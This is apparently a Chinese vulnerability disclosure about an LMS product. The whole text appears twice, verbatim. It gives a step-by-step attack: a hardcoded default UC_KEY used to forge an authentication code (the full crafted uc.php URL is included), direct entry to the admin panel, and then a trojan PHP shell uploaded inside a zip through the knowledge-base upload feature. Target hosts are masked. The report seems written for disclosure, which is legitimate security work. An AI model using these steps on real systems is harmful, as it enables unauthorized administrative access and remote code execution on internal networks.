
在线人数还挺多的。
0x0
/lms/api/uc_config.php 其中的UC_KEY值是一个默认值,那就可以用UC的接口去登陆
登陆脚本查看UC 统一的KEY解密函数
KEY固定值为:define("UC_KEY", "zlms@**.**.**.**");
那么生成一下:
**.**.**.**/lms/api/uc.php?code=353etSSAKUxHGQOKjxuiSuGJ1wlD1YQuNPHoUcASALEGO45W9ZnoTWMVbQnumVVjJVjPeChxYrMyF%2Fjvlx77s9l%2BXp4eDNa9aWEpzMuyrH0
再访问**.**.**.**/lms/?c=Admin.Index&m=admin_main
就已经登陆进后台了。
拿shell
打开:资源管理->知识管理->新增知识库内容

到第二步随便填,第三步叫你上传压缩包,
新建一个压缩包 然后新建一个目录,在目录里放入木马文件就可以了。
再到前台首页去查看文章


点击一下就OK了。上传的文件为
**.**.**.**/czt_lms_data/czt_lms_file/storage/attachment/kb/29/n_n.php
发现在内网,影响内网安全

**.**.**.**/lms/

在线人数还挺多的。
0x0
/lms/api/uc_config.php 其中的UC_KEY值是一个默认值,那就可以用UC的接口去登陆
登陆脚本查看UC 统一的KEY解密函数
KEY固定值为:define("UC_KEY", "zlms@**.**.**.**");
那么生成一下:
**.**.**.**/lms/api/uc.php?code=353etSSAKUxHGQOKjxuiSuGJ1wlD1YQuNPHoUcASALEGO45W9ZnoTWMVbQnumVVjJVjPeChxYrMyF%2Fjvlx77s9l%2BXp4eDNa9aWEpzMuyrH0
再访问**.**.**.**/lms/?c=Admin.Index&m=admin_main
就已经登陆进后台了。
拿shell
打开:资源管理->知识管理->新增知识库内容

到第二步随便填,第三步叫你上传压缩包,
新建一个压缩包 然后新建一个目录,在目录里放入木马文件就可以了。
再到前台首页去查看文章


点击一下就OK了。上传的文件为
**.**.**.**/czt_lms_data/czt_lms_file/storage/attachment/kb/29/n_n.php
发现在内网,影响内网安全
